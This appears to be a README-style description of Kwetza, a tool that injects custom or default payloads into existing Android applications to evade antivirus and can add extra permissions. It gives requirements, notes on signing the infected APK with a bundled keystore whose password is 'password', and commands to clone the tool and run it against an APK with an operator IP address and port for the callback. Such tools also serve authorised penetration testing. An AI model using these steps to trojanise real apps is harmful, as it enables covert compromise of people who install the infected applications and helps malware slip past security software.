What does it do?
Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application’s default permissions or inject additional permissions to gain additional functionality.
+ Apktool https://ibotpeaches.github.io/Apktool/install
+ Python 2.7.x & beautifulsoup4
– Kwetza has been developed to work with Python 2.
– Kwetza by default will use the template and keystore located in the folder “payload” to inject and sign the infected apk.
– If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the “payload” folder and rename to the existing keystore or change the reference in the kwetza.py.
– The same can be done for payload templates.
– The password for the default keystore is, well, “password”.
git clone https://github.com/sensepost/kwetza && cd kwetza
python kwetza.py your_sample.apk [your IP Address] https [your port] yes